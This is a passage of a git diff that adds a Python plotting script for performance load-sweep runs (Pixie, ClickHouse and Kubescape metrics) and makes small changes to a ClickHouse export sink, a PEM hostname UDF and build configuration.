spec_path: Path | None + results: pd.DataFrame # long-format metric rows + actions: pd.DataFrame # begin_X/end_X timeline + spec_tags: list[str] # tags from spec.parquet + + @property + def run_start(self): + m = self.actions.query("name == 'begin_run:'") + return m["timestamp"].iloc[0] if not m.empty else None + + @property + def run_end(self): + m = self.actions.query("name == 'end_run:'") + return m["timestamp"].iloc[0] if not m.empty else None + + @property + def burnin_start(self): + m = self.actions.query("name == 'begin_burnin:'") + return m["timestamp"].iloc[0] if not m.empty else None + + +def find_runs(sweep_dir: Path) -> list[RunData]: + """Discover all Nx/ subdirs with finished parquets. Skip in-flight runs.""" + runs: list[RunData] = [] + for sub in sorted(sweep_dir.iterdir(), key=lambda p: p.name): + if not sub.is_dir(): + continue + m = MULTIPLIER_RE.match(sub.name) + if not m: + continue + results = list(sub.rglob("results_*.parquet")) + if not results: + continue # in-flight, no parquet yet + # If there are multiple result files, pick the largest (most rows). + results.sort(key=lambda p: p.stat().st_size, reverse=True) + res_path = results[0] + # A 0-byte parquet means perf_tool aborted mid-write — skip. + if res_path.stat().st_size < 1024: + continue + spec_candidates = list(res_path.parent.glob("spec.parquet")) + spec_path = spec_candidates[0] if spec_candidates else None + + results_df = pq.read_table(res_path).to_pandas() + results_df["timestamp"] = pd.to_datetime( + results_df["timestamp"], utc=True + ) + actions = results_df[ + results_df["name"].str.startswith(("begin_", "end_")) + ].copy() + spec_tags: list[str] = [] + if spec_path is not None: + try: + spec_row = pq.read_table(spec_path).to_pandas().iloc[0] + spec_obj = json.loads(spec_row["spec"]) + spec_tags = list(spec_obj.get("tags", [])) + except Exception as e: # pragma: no cover + print(f" ! spec parse failed for {sub.name}: {e}", + file=sys.stderr) + runs.append( + RunData( + name=sub.name, + multiplier=int(m.group(1)), + results_path=res_path, + spec_path=spec_path, + results=results_df, + actions=actions, + spec_tags=spec_tags, + ) + ) + return runs + + +def _phase_markers(ax, run: RunData): + """Vertical lines for BURNIN start, RUN start, RUN end.""" + for ts, label, color in [ + (run.burnin_start, "burnin", "#888888"), + (run.run_start, "RUN", "#cc0000"), + (run.run_end, "end", "#888888"), + ]: + if ts is not None: + ax.axvline(ts, color=color, linestyle="--", linewidth=1, alpha=0.6) + ax.text( + ts, ax.get_ylim()[1], f" {label}", + fontsize=7, color=color, va="top", ha="left", + ) + + +def _filter_run(df: pd.DataFrame, run: RunData) -> pd.DataFrame: + """Limit a metric series to the experiment's begin_run..end_run window.""" + if run.run_start is None or run.run_end is None: + return df + return df[(df["timestamp"] >= run.run_start) + & (df["timestamp"] <= run.run_end)] + + +def _delta_rate(df: pd.DataFrame, per_seconds: float = 60.0) -> pd.DataFrame: + """Convert a monotonic-counter time series to per-N-seconds rate.""" + df = df.sort_values("timestamp").reset_index(drop=True) + df["dt"] = df["timestamp"].diff().dt.total_seconds() + df["dv"] = df["value"].diff() + df["rate"] = (df["dv"] / df["dt"]) * per_seconds + df = df[df["rate"] >= 0] # drop the first row + any counter resets + return df + + +# ------------------------------------------------------------------ per-run + +POD_COLORS = { + "vizier-pem": "#1f77b4", + "kelvin": "#ff7f0e", + "vizier-query-broker": "#2ca02c", + "vizier-metadata": "#9467bd", + "vizier-cloud-connector": "#8c564b", + "pl-nats": "#7f7f7f", +} + + +def _pod_color(pod: str) -> str: + for prefix, c in POD_COLORS.items(): + if prefix in pod: + return c + return "#cccccc" + + +def render_run(run: RunData, out_path: Path) -> None: + fig, axes = plt.subplots(4, 2, figsize=(15, 14), constrained_layout=True) + fig.suptitle( + f"{run.name} ({run.multiplier}× load) — " + f"results: {run.results_path.relative_to(run.results_path.parents[5])}", + fontsize=12, + y=1.02, + ) + + # ----- panel (0,0) recorder export rate (events / 5s tick) ----- + ax = axes[0, 0] + ex = run.results[run.results["name"] == "clickhouse_export_rows"] + if not ex.empty: + ax.plot(ex["timestamp"], ex["value"], marker=".", markersize=2, + linewidth=0.8, label="rows/tick") + ax.set_title("Pixie → CH recorder rate (rows per 5s tick)") + ax.set_ylabel("rows per tick") + ax.grid(alpha=0.3) + _phase_markers(ax, run) + else: + ax.set_title("clickhouse_export_rows — NO DATA") + ax.text(0.5, 0.5, "no data", ha="center", va="center", + transform=ax.transAxes, color="red") + + # ----- panel (0,1) per-pod CPU (during RUN) ----- + ax = axes[0, 1] + cpu = run.results[run.results["name"] == "cpu_usage"] + cpu = _filter_run(cpu, run) + if not cpu.empty: + for pod, g in cpu.groupby("tag_pod"): + label = pod.split("/")[-1] if pod else "?" + ax.plot(g["timestamp"], g["value"] * 100, + label=label[:30], linewidth=1.0, color=_pod_color(pod)) + ax.set_title("Pixie pods CPU% (during RUN)") + ax.set_ylabel("% of one core") + ax.legend(fontsize=7, loc="upper right", ncol=2) + ax.grid(alpha=0.3) + else: + ax.set_title("cpu_usage — NO DATA") + + # ----- panel (1,0) CH memory ----- + ax = axes[1, 0] + mem = run.results[ + run.results["name"] == "clickhouse_memory_tracking_bytes" + ] + if not mem.empty: + ax.plot(mem["timestamp"], mem["value"] / 1e9, + color="#d62728", linewidth=1.2) + ax.set_title("ClickHouse memory_tracking (GB)") + ax.set_ylabel("GB") + ax.grid(alpha=0.3) + _phase_markers(ax, run) + else: + ax.set_title("clickhouse_memory_tracking_bytes — NO DATA") + + # ----- panel (1,1) CH parts_active + queries_total rate ----- + ax = axes[1, 1] + parts = run.results[run.results["name"] == "clickhouse_parts_active"] + qrate = run.results[run.results["name"] == "clickhouse_queries_total"] + qrate = _delta_rate(qrate) + if not parts.empty: + ax.plot(parts["timestamp"], parts["value"], + color="#17becf", linewidth=1.2, label="parts_active") + if not qrate.empty: + ax2 = ax.twinx() + ax2.plot(qrate["timestamp"], qrate["rate"], + color="#bcbd22", linewidth=1.0, label="queries/min") + ax2.set_ylabel("queries/min", color="#bcbd22") + ax2.tick_params(axis="y", labelcolor="#bcbd22") + ax.set_title("CH parts_active + query rate") + ax.set_ylabel("parts_active", color="#17becf") + ax.tick_params(axis="y", labelcolor="#17becf") + ax.grid(alpha=0.3) + + # ----- panel (2,0) forensic_alert_count over time ----- + ax = axes[2, 0] + alerts = run.results[run.results["name"] == "forensic_alert_count"] + if not alerts.empty: + ax.plot(alerts["timestamp"], alerts["value"], + color="#e377c2", linewidth=1.2, marker=".", markersize=3) + ax.set_title(f"forensic_alert_count " + f"(max={int(alerts['value'].max())})") + ax.set_ylabel("alerts in window") + ax.grid(alpha=0.3) + _phase_markers(ax, run) + else: + ax.set_title("forensic_alert_count — NO DATA") + + # ----- panel (2,1) inserted_rows rate (rows/min) ----- + ax = axes[2, 1] + ins = run.results[run.results["name"] == "clickhouse_inserted_rows_total"] + ins = _delta_rate(ins) + if not ins.empty: + ax.plot(ins["timestamp"], ins["rate"] / 1e3, + color="#9467bd", linewidth=1.2) + ax.set_title(f"CH inserted rows/min (peak: " + f"{int(ins['rate'].max()/1e3)}K/min)") + ax.set_ylabel("K rows/min") + ax.grid(alpha=0.3) + _phase_markers(ax, run) + else: + ax.set_title("clickhouse_inserted_rows_total — NO DATA") + + # ----- panel (3,0) kubescape node-agent CPU% + RSS ----- + ax = axes[3, 0] + ks_cpu_total = run.results[ + run.results["name"] == "kubescape_node_agent_cpu_seconds_total" + ] + # cpu_seconds_total is a monotonic Prometheus counter — convert to + # CPU% by dividing the delta by the wall-clock delta and *100. + ks_cpu_rate = _delta_rate(ks_cpu_total, per_seconds=100.0) + ks_rss = run.results[run.results["name"] == "kubescape_node_agent_rss"] + plotted_any = False + if not ks_cpu_rate.empty: + ax.plot(ks_cpu_rate["timestamp"], ks_cpu_rate["rate"], + color="#1f77b4", linewidth=1.2, label="CPU %") + plotted_any = True + if not ks_rss.empty: + ax2 = ax.twinx() + ax2.plot(ks_rss["timestamp"], ks_rss["value"] / (1024 * 1024), + color="#ff7f0e", linewidth=1.2, label="RSS MB") + ax2.set_ylabel("RSS MB", color="#ff7f0e") + ax2.tick_params(axis="y", labelcolor="#ff7f0e") + plotted_any = True + if plotted_any: + cpu_peak = (ks_cpu_rate['rate'].max() + if not ks_cpu_rate.empty else 0) + rss_peak_mb = (ks_rss['value'].max() / (1024 * 1024) + if not ks_rss.empty else 0) + ax.set_title( + f"Kubescape node-agent (peak: {cpu_peak:.0f}% CPU, " + f"{rss_peak_mb:.0f} MB RSS)" + ) + ax.set_ylabel("CPU %", color="#1f77b4") + ax.tick_params(axis="y", labelcolor="#1f77b4") + ax.grid(alpha=0.3) + _phase_markers(ax, run) + else: + ax.set_title("kubescape_node_agent_* — NO DATA") + + # ----- panel (3,1) kubescape node-agent goroutines (leak detector) ----- + ax = axes[3, 1] + ks_g = run.results[run.results["name"] == "kubescape_node_agent_goroutines"] + if not ks_g.empty: + ax.plot(ks_g["timestamp"], ks_g["value"], + color="#2ca02c", linewidth=1.2, marker=".", markersize=3) + # First-vs-last comparison flags monotonic growth → goroutine leak. + first = ks_g.iloc[0]["value"] + last = ks_g.iloc[-1]["value"] + ax.set_title( + f"Kubescape goroutines (start={int(first)}, end={int(last)}, " + f"peak={int(ks_g['value'].max())})" + ) + ax.set_ylabel("goroutines") + ax.grid(alpha=0.3) + _phase_markers(ax, run) + else: + ax.set_title("kubescape_node_agent_goroutines — NO DATA") + + # x-axis formatter for all time-series panels + for ax in axes.flat: + ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M")) + + fig.savefig(out_path, dpi=120, bbox_inches="tight") + plt.close(fig) + + +# ------------------------------------------------------------------ summary + +def render_summary(runs: list[RunData], out_path: Path) -> None: + """Small-multiples: each multiplier on the same recorder-rate axis, + stacked top-to-bottom so it's obvious whether 16× actually achieves 16×. + """ + if not runs: + return + fig, axes = plt.subplots( + len(runs), 1, + figsize=(14, 2.5 * len(runs)), + sharex=False, + constrained_layout=True, + ) + if len(runs) == 1: + axes = [axes] + fig.suptitle( + "Recorder rate across load multipliers (rows / 5s tick)", + fontsize=13, + y=1.0, + ) + for ax, run in zip(axes, runs): + ex = run.results[run.results["name"] == "clickhouse_export_rows"] + if ex.empty: + ax.text(0.5, 0.5, "no data", ha="center", va="center", + transform=ax.transAxes, color="red") + ax.set_title(f"{run.name}") + continue + ax.plot(ex["timestamp"], ex["value"], + marker=".", markersize=2, linewidth=0.8) + ax.set_title( + f"{run.name} ({run.multiplier}×): " + f"mean={ex['value'].mean():.0f}, peak={ex['value'].max():.0f}, " + f"n={len(ex)} ticks" + ) + ax.set_ylabel("rows/tick") + ax.grid(alpha=0.3) + ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M")) + _phase_markers(ax, run) + fig.savefig(out_path, dpi=120, bbox_inches="tight") + plt.close(fig) + + +# ------------------------------------------------------------------ scorecard + +def render_scorecard(runs: list[RunData], out_path: Path) -> None: + """Grouped bar chart: peak/mean of key metrics per multiplier. + Designed to make non-linear scaling jump out (e.g. 16× recorder rate + not actually 16× because of a bottleneck).""" + if not runs: + return + rows = [] + for r in runs: + ex = r.results[r.results["name"] == "clickhouse_export_rows"] + cpu_pem = r.results[ + (r.results["name"] == "cpu_usage") + & r.results["tag_pod"].fillna("").str.contains("vizier-pem") + ] + cpu_pem = _filter_run(cpu_pem, r) + mem = r.results[ + r.results["name"] == "clickhouse_memory_tracking_bytes" + ] + ins = _delta_rate( + r.results[r.results["name"] == "clickhouse_inserted_rows_total"] + ) + ks_cpu = _delta_rate( + r.results[r.results["name"] == "kubescape_node_agent_cpu_seconds_total"], + per_seconds=100.0, + ) + ks_rss = r.results[ + r.results["name"] == "kubescape_node_agent_rss" + ] + ks_g = r.results[ + r.results["name"] == "kubescape_node_agent_goroutines" + ] + rows.append({ + "multiplier": r.multiplier, + "name": r.name, + "recorder_mean_per_tick": ex["value"].mean() if not ex.empty else 0, + "recorder_peak_per_tick": ex["value"].max() if not ex.empty else 0, + "pem_cpu_mean_pct": (cpu_pem["value"].mean()*100) if not cpu_pem.empty else 0, + "pem_cpu_peak_pct": (cpu_pem["value"].max()*100) if not cpu_pem.empty else 0, + "ch_mem_peak_gb": (mem["value"].max()/1e9) if not mem.empty else 0, + "ch_ins_peak_kpm": (ins["rate"].max()/1e3) if not ins.empty else 0, + "ks_cpu_mean_pct": ks_cpu["rate"].mean() if not ks_cpu.empty else 0, + "ks_cpu_peak_pct": ks_cpu["rate"].max() if not ks_cpu.empty else 0, + "ks_rss_peak_mb": (ks_rss["value"].max()/(1024*1024)) if not ks_rss.empty else 0, + "ks_goroutines_peak": ks_g["value"].max() if not ks_g.empty else 0, + }) + df = pd.DataFrame(rows).sort_values("multiplier").reset_index(drop=True) + metrics = [ + ("recorder_mean_per_tick", "Recorder mean rows/tick"), + ("recorder_peak_per_tick", "Recorder peak rows/tick"), + ("pem_cpu_mean_pct", "PEM CPU mean %"), + ("pem_cpu_peak_pct", "PEM CPU peak %"), + ("ch_mem_peak_gb", "CH memory peak GB"), + ("ch_ins_peak_kpm", "CH inserts peak K/min"), + ("ks_cpu_mean_pct", "Kubescape node-agent CPU mean %"), + ("ks_cpu_peak_pct", "Kubescape node-agent CPU peak %"), + ("ks_rss_peak_mb", "Kubescape node-agent RSS peak MB"), + ] + fig, axes = plt.subplots(3, 3, figsize=(15, 10), constrained_layout=True) + fig.suptitle( + "Scorecard across load multipliers — " + "ideal: linear in mult unless bottlenecked", + fontsize=12, y=1.02, + ) + for ax, (col, title) in zip(axes.flat, metrics): + bars = ax.bar(df["name"], df[col], color="#1f77b4") + for b, v in zip(bars, df[col]): + ax.text(b.get_x() + b.get_width() / 2, b.get_height(), + f"{v:.1f}", ha="center", va="bottom", fontsize=8) + ax.set_title(title) + ax.grid(axis="y", alpha=0.3) + fig.savefig(out_path, dpi=120, bbox_inches="tight") + plt.close(fig) + + +# ------------------------------------------------------------------ alerts + +def render_alert_distribution(runs: list[RunData], out_path: Path) -> None: + """Plot forensic_alert_count vs minutes-from-RUN-start across all runs, + plus a cumulative view + an "alerts in first half vs second half" stat. + + The hypothesis we're testing: Kubescape's ApplicationProfile is in + "learning" state for the first few minutes after pod creation, then + transitions to "completed" — at which point R0002 et al start firing + against actual baseline-deviating traffic. If the profile completes + deep into the RUN window, every alert clusters near the end. + """ + if not runs: + return + fig, axes = plt.subplots(3, 1, figsize=(14, 11), constrained_layout=True) + fig.suptitle( + "forensic_alert_count distribution — when do alerts actually fire?", + fontsize=13, y=1.0, + ) + cmap = plt.colormaps.get_cmap("viridis") + n = len(runs) + + # ----- panel 0: alerts per 30s tick, time relative to RUN-start ----- + ax = axes[0] + rows_for_table = [] + for i, run in enumerate(runs): + alerts = run.results[run.results["name"] == "forensic_alert_count"] + if alerts.empty or run.run_start is None: + continue + rel = (alerts["timestamp"] - run.run_start).dt.total_seconds() / 60.0 + ax.plot(rel, alerts["value"], + color=cmap(i / max(n - 1, 1)), + marker=".", markersize=4, linewidth=1.0, + label=f"{run.name} (peak {int(alerts['value'].max())})") + # phase ratio: alerts in first half of RUN vs second half + dur_min = (run.run_end - run.run_start).total_seconds() / 60.0 \ + if run.run_end is not None else rel.max() + first_half = alerts[ + (alerts["timestamp"] >= run.run_start) + & (alerts["timestamp"] < run.run_start + pd.Timedelta( + minutes=dur_min / 2)) + ]["value"].sum() + second_half = alerts[ + (alerts["timestamp"] >= run.run_start + pd.Timedelta( + minutes=dur_min / 2)) + & (alerts["timestamp"] <= (run.run_end or alerts["timestamp"].max())) + ]["value"].sum() + total = first_half + second_half + rows_for_table.append({ + "name": run.name, + "total": int(total), + "first_half": int(first_half), + "second_half": int(second_half), + "second_half_pct": (100.0 * second_half / total) if total else 0, + }) + ax.axvline(0, color="red", linestyle="--", linewidth=1, alpha=0.7, + label="RUN start") + ax.set_title("Alerts per 30 s metric tick (x-axis: minutes since RUN start)") + ax.set_xlabel("minutes since begin_run") + ax.set_ylabel("alerts in last 1-min window") + ax.legend(fontsize=8, loc="upper left") + ax.grid(alpha=0.3) + + # ----- panel 1: cumulative alerts over RUN-relative time ----- + ax = axes[1] + for i, run in enumerate(runs): + alerts = run.results[run.results["name"] == "forensic_alert_count"] \ + .sort_values("timestamp") + if alerts.empty or run.run_start is None: + continue + rel = (alerts["timestamp"] - run.run_start).dt.total_seconds() / 60.0 + cum = alerts["value"].cumsum() + ax.plot(rel, cum, + color=cmap(i / max(n - 1, 1)), + linewidth=1.4, + label=f"{run.name} (Σ {int(cum.iloc[-1])})") + ax.axvline(0, color="red", linestyle="--", linewidth=1, alpha=0.7) + ax.set_title("Cumulative alerts (steeper later in RUN ⇒ profile-learning lag)") + ax.set_xlabel("minutes since begin_run") + ax.set_ylabel("cumulative alerts") + ax.legend(fontsize=8, loc="upper left") + ax.grid(alpha=0.3) + + # ----- panel 2: stacked bar showing first-half vs second-half split ----- + ax = axes[2] + if rows_for_table: + df = pd.DataFrame(rows_for_table) + x = range(len(df)) + b1 = ax.bar(x, df["first_half"], color="#888888", + label="first half of RUN") + b2 = ax.bar(x, df["second_half"], bottom=df["first_half"], + color="#d62728", label="second half of RUN") + for i, (b, pct) in enumerate(zip(b2, df["second_half_pct"])): + ax.text(i, df["first_half"].iloc[i] + df["second_half"].iloc[i], + f"{pct:.0f}% late", + ha="center", va="bottom", fontsize=9, fontweight="bold") + ax.set_xticks(list(x)) + ax.set_xticklabels(df["name"]) + ax.set_title( + "Alerts grouped by RUN-half — " + "% late ≈ how much of the alert mass clusters in the second half " + "(profile-completion fingerprint)" + ) + ax.set_ylabel("Σ alerts in window") + ax.legend(fontsize=9) + ax.grid(axis="y", alpha=0.3) + + fig.savefig(out_path, dpi=120, bbox_inches="tight") + plt.close(fig) + + +# ------------------------------------------------------------------ scaling + +# KPI extractors — each returns (mean_during_run, max_during_run) for a single +# RunData. Returning NaN means "missing"; the plot will skip that point. +import math + + +def _kpi_recorder(r: RunData) -> tuple[float, float]: + df = r.results[r.results["name"] == "clickhouse_export_rows"] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean(), df["value"].max() + + +def _kpi_pem_cpu(r: RunData) -> tuple[float, float]: + df = r.results[ + (r.results["name"] == "cpu_usage") + & r.results["tag_pod"].fillna("").str.contains("vizier-pem") + ] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean() * 100, df["value"].max() * 100 + + +def _kpi_kelvin_cpu(r: RunData) -> tuple[float, float]: + df = r.results[ + (r.results["name"] == "cpu_usage") + & r.results["tag_pod"].fillna("").str.contains("kelvin") + ] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean() * 100, df["value"].max() * 100 + + +def _kpi_ch_memory_gb(r: RunData) -> tuple[float, float]: + df = r.results[r.results["name"] == "clickhouse_memory_tracking_bytes"] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean() / 1e9, df["value"].max() / 1e9 + + +def _kpi_ch_inserts_kpm(r: RunData) -> tuple[float, float]: + df = _delta_rate( + r.results[r.results["name"] == "clickhouse_inserted_rows_total"] + ) + if df.empty: + return math.nan, math.nan + return df["rate"].mean() / 1e3, df["rate"].max() / 1e3 + + +def _kpi_alerts(r: RunData) -> tuple[float, float]: + df = r.results[r.results["name"] == "forensic_alert_count"] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean(), df["value"].max() + + +def _kpi_ks_cpu(r: RunData) -> tuple[float, float]: + df = _delta_rate( + r.results[r.results["name"] == "kubescape_node_agent_cpu_seconds_total"], + per_seconds=100.0, + ) + if df.empty: + return math.nan, math.nan + return df["rate"].mean(), df["rate"].max() + + +def _kpi_ks_rss_mb(r: RunData) -> tuple[float, float]: + df = r.results[r.results["name"] == "kubescape_node_agent_rss"] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean() / (1024 * 1024), df["value"].max() / (1024 * 1024) + + +def _kpi_ks_goroutines(r: RunData) -> tuple[float, float]: + df = r.results[r.results["name"] == "kubescape_node_agent_goroutines"] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean(), df["value"].max() + + +# (extractor, panel title, y-axis unit) +SCALING_KPIS = [ + (_kpi_recorder, "Recorder rows/tick", "rows/tick"), + (_kpi_pem_cpu, "PEM CPU", "% (of one core)"), + (_kpi_kelvin_cpu, "Kelvin CPU", "% (of one core)"), + (_kpi_ch_memory_gb, "CH memory_tracking", "GB"), + (_kpi_ch_inserts_kpm, "CH inserted rows/min", "K rows/min"), + (_kpi_alerts, "forensic_alert_count", "alerts / 1-min window"), + (_kpi_ks_cpu, "Kubescape node-agent CPU", "%"), + (_kpi_ks_rss_mb, "Kubescape node-agent RSS", "MB"), + (_kpi_ks_goroutines, "Kubescape goroutines", "count"), +] + + +def render_scaling(runs: list[RunData], out_path: Path) -> None: + """Log-log scaling chart: each panel plots mean+max of a KPI versus + the load multiplier. Linear-on-log-log = power-law scaling; flat or + concave shape ⇒ saturation / bottleneck has kicked in. + + Useful for spotting where Pixie / CH / kubescape stop scaling + linearly with workload, which is the *whole point* of a load sweep. + """ + if not runs: + return + runs = sorted(runs, key=lambda r: r.multiplier) + multipliers = [r.multiplier for r in runs] + + fig, axes = plt.subplots(3, 3, figsize=(15, 11), constrained_layout=True) + fig.suptitle( + "Scaling — log-log: mean (solid) & max (dashed) KPI vs load multiplier " + "[ideal: straight line, slope ≈ 1 = strict linear]", + fontsize=12, y=1.02, + ) + for ax, (extractor, title, unit) in zip(axes.flat, SCALING_KPIS): + means, maxes = [], [] + for r in runs: + m, mx = extractor(r) + means.append(m) + maxes.append(mx) + ax.plot(multipliers, means, + marker="o", linewidth=1.4, color="#1f77b4", label="mean") + ax.plot(multipliers, maxes, + marker="s", linewidth=1.0, color="#d62728", + linestyle="--", label="max") + # Annotate each point so you can read raw numbers off the chart. + for x, y in zip(multipliers, means): + if y is not None and not (isinstance(y, float) and math.isnan(y)): + ax.annotate(f"{y:.1f}", (x, y), + textcoords="offset points", xytext=(4, 4), + fontsize=7, color="#1f77b4") + for x, y in zip(multipliers, maxes): + if y is not None and not (isinstance(y, float) and math.isnan(y)): + ax.annotate(f"{y:.1f}", (x, y), + textcoords="offset points", xytext=(4, -10), + fontsize=7, color="#d62728") + # log-log axes when feasible; fall back to linear if values are zero + # or negative on either series (matplotlib refuses log on those). + all_vals = [v for v in means + maxes if v is not None + and not (isinstance(v, float) and math.isnan(v))] + if all_vals and min(all_vals) > 0: + ax.set_xscale("log", base=2) + ax.set_yscale("log") + # Show the actual multiplier values, not 2^n labels. + ax.set_xticks(multipliers) + ax.get_xaxis().set_major_formatter( + plt.matplotlib.ticker.ScalarFormatter() + ) + else: + # Some KPI series have 0s (typical for forensic_alert_count + # mean ≈ 0 if the kubescape pipeline is broken). Log-scale + # x, linear y so at least the multiplier axis stays right. + ax.set_xscale("log", base=2) + ax.set_xticks(multipliers) + ax.get_xaxis().set_major_formatter( + plt.matplotlib.ticker.ScalarFormatter() + ) + ax.set_xlabel("load multiplier (×)") + ax.set_ylabel(unit) + ax.set_title(title, fontsize=10) + ax.grid(which="both", alpha=0.3) + ax.legend(fontsize=8, loc="best") + + fig.savefig(out_path, dpi=120, bbox_inches="tight") + plt.close(fig) + + +# ------------------------------------------------------------------ main + +def main(): + p = argparse.ArgumentParser(description=__doc__) + p.add_argument("sweep_dir", type=Path, nargs="?", + help="path to perf-sweep- dir; defaults to latest") + args = p.parse_args() + + if args.sweep_dir is None: + candidates = sorted( + Path("/tmp").glob("perf-sweep-*"), + key=lambda p: p.stat().st_mtime, reverse=True, + ) + if not candidates: + print("no /tmp/perf-sweep-* dirs found", file=sys.stderr) + return 1 + args.sweep_dir = candidates[0] + print(f"sweep_dir (auto): {args.sweep_dir}", file=sys.stderr) + + runs = find_runs(args.sweep_dir) + if not runs: + print("no finished parquets found in", args.sweep_dir, file=sys.stderr) + return 0 + + for r in runs: + out = args.sweep_dir / f"{r.name}.png" + render_run(r, out) + print(f" {r.name}.png (results: {len(r.results)} rows, " + f"{r.spec_tags[:3] if r.spec_tags else '—'})") + + render_summary(runs, args.sweep_dir / "summary.png") + print(f" summary.png ({len(runs)} runs stacked)") + + render_scorecard(runs, args.sweep_dir / "scorecard.png") + print(f" scorecard.png ({len(runs)} runs in bar chart)") + + render_alert_distribution(runs, args.sweep_dir / "alerts.png") + print(f" alerts.png ({len(runs)} runs, alert ramp vs RUN-relative time)") + + render_scaling(runs, args.sweep_dir / "scaling.png") + print(f" scaling.png ({len(runs)} runs, log-log KPI vs multiplier)") + return 0 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/skaffold/skaffold_vizier.yaml b/skaffold/skaffold_vizier.yaml index 33389dffb2e..f8370a1f7e1 100644 --- a/skaffold/skaffold_vizier.yaml +++ b/skaffold/skaffold_vizier.yaml @@ -81,6 +81,7 @@ profiles: path: /build/artifacts/context=./bazel/args value: - --compilation_mode=opt + - --config=x86_64_sysroot - name: heap patches: - op: add diff --git a/src/carnot/exec/clickhouse_export_sink_node.cc b/src/carnot/exec/clickhouse_export_sink_node.cc index 6a11a42d37a..c7000ab99d4 100644 --- a/src/carnot/exec/clickhouse_export_sink_node.cc +++ b/src/carnot/exec/clickhouse_export_sink_node.cc @@ -35,6 +35,9 @@ namespace px { namespace carnot { namespace exec { +// TODO(ddelnano): Defend against columns that don't exist. These should be +// ignored by the Node. + using table_store::schema::RowBatch; using table_store::schema::RowDescriptor; @@ -148,12 +151,12 @@ Status ClickHouseExportSinkNode::ConsumeNextImpl(ExecState* /*exec_state*/, cons break; } case types::UINT128: { - // UINT128 is exported as STRING (UUID format) + // UINT128 is exported as STRING in "high:low" format to match + // the ClickHouseSourceNode's parsing in clickhouse_source_node.cc auto col = std::make_shared(); for (int64_t i = 0; i < num_rows; ++i) { auto val = types::GetValueFromArrowArray(arrow_col.get(), i); - std::string uuid_str = sole::rebuild(absl::Uint128High64(val), absl::Uint128Low64(val)).str(); - col->Append(uuid_str); + col->Append(absl::Substitute("$0:$1", absl::Uint128High64(val), absl::Uint128Low64(val))); } block.AppendColumn(mapping.clickhouse_column_name(), col); break; @@ -164,6 +167,34 @@ Status ClickHouseExportSinkNode::ConsumeNextImpl(ExecState* /*exec_state*/, cons } } + // Auto-derive event_time from time_ if time_ is present but event_time is not. + // The ClickHouse table schema uses event_time (DateTime64(3), milliseconds) for + // partitioning and ordering, but the Pixie table has time_ (TIME64NS, nanoseconds). + bool has_time_ = false; + bool has_event_time = false; + int time_col_index = -1; + for (const auto& mapping : plan_node_->column_mappings()) { + if (mapping.clickhouse_column_name() == "time_") { + has_time_ = true; + time_col_index = mapping.input_column_index(); + } + if (mapping.clickhouse_column_name() == "event_time") { + has_event_time = true; + } + } + + if (has_time_ && !has_event_time && time_col_index >= 0) { + auto arrow_col = rb.ColumnAt(time_col_index); + int64_t num_rows = arrow_col->length(); + auto event_time_col = std::make_shared(3); + for (int64_t i = 0; i < num_rows; ++i) { + int64_t ns_val = types::GetValueFromArrowArray(arrow_col.get(), i); + // Convert nanoseconds to milliseconds for DateTime64(3) + event_time_col->Append(ns_val / 1000000LL); + } + block.AppendColumn("event_time", event_time_col); + } + // Insert the block into ClickHouse clickhouse_client_->Insert(plan_node_->table_name(), block); diff --git a/src/carnot/funcs/metadata/metadata_ops.cc b/src/carnot/funcs/metadata/metadata_ops.cc index 3fe4e21692d..d6409e6f456 100644 --- a/src/carnot/funcs/metadata/metadata_ops.cc +++ b/src/carnot/funcs/metadata/metadata_ops.cc @@ -127,6 +127,7 @@ void RegisterMetadataOpsOrDie(px::carnot::udf::Registry* registry) { registry->RegisterOrDie("upid_to_deployment_id"); registry->RegisterOrDie("upid_to_string"); registry->RegisterOrDie("_exec_hostname"); + registry->RegisterOrDie("_pem_hostname"); registry->RegisterOrDie("_exec_host_num_cpus"); registry->RegisterOrDie("vizier_id"); registry->RegisterOrDie("vizier_name"); diff --git a/src/carnot/funcs/metadata/metadata_ops.h b/src/carnot/funcs/metadata/metadata_ops.h index 241079858a4..af82f9738f8 100644 --- a/src/carnot/funcs/metadata/metadata_ops.h +++ b/src/carnot/funcs/metadata/metadata_ops.h @@ -2926,6 +2926,33 @@ class HostnameUDF : public ScalarUDF { } }; +class PEMHostnameUDF : public ScalarUDF { + public: + /** + * @brief Gets the hostname of the PEM agent's machine. + * Unlike _exec_hostname (UDF_ALL), this is restricted to UDF_PEM so the + * distributed planner is forced to execute it on the PEM before data is + * shipped to Kelvin. Use this when the hostname must reflect the agent + * that collected the data rather than the agent that exports it. + */ + StringValue Exec(FunctionContext* ctx) { + auto md = GetMetadataState(ctx); + return md->hostname(); + } + + static udf::ScalarUDFDocBuilder Doc() { + return udf::ScalarUDFDocBuilder("Get the hostname of the PEM agent.") + .Details( + "Get the hostname of the PEM agent that collected the data. " + "This UDF is restricted to PEM execution, so the distributed planner " + "will always run it on the PEM even when the downstream sink is on Kelvin.") + .Example("df.hostname = px._pem_hostname()") + .Returns("The hostname of the PEM agent."); + } + + static udfspb::UDFSourceExecutor Executor() { return udfspb::UDFSourceExecutor::UDF_PEM; } +}; + class HostNumCPUsUDF : public ScalarUDF { public: /** diff --git a/src/e2e_test/perf_tool/cmd/BUILD.bazel b/src/e2e_test/perf_tool/cmd/BUILD.bazel index 012fd3488b0..23540786c4b 100644 --- a/src/e2e_test/perf_tool/cmd/BUILD.bazel +++ b/src/e2e_test/perf_tool/cmd/BUILD.bazel @@ -33,6 +33,7 @@ go_library( "//src/e2e_test/perf_tool/pkg/cluster", "//src/e2e_test/perf_tool/pkg/cluster/gke", "//src/e2e_test/perf_tool/pkg/cluster/local", + "//src/e2e_test/perf_tool/pkg/exporter", "//src/e2e_test/perf_tool/pkg/pixie", "//src/e2e_test/perf_tool/pkg/run", "//src/e2e_test/perf_tool/pkg/suites", diff --git a/src/e2e_test/perf_tool/cmd/run.go b/src/e2e_test/perf_tool/cmd/run.go index 5d8a89a9f7a..3eb9c8855c4 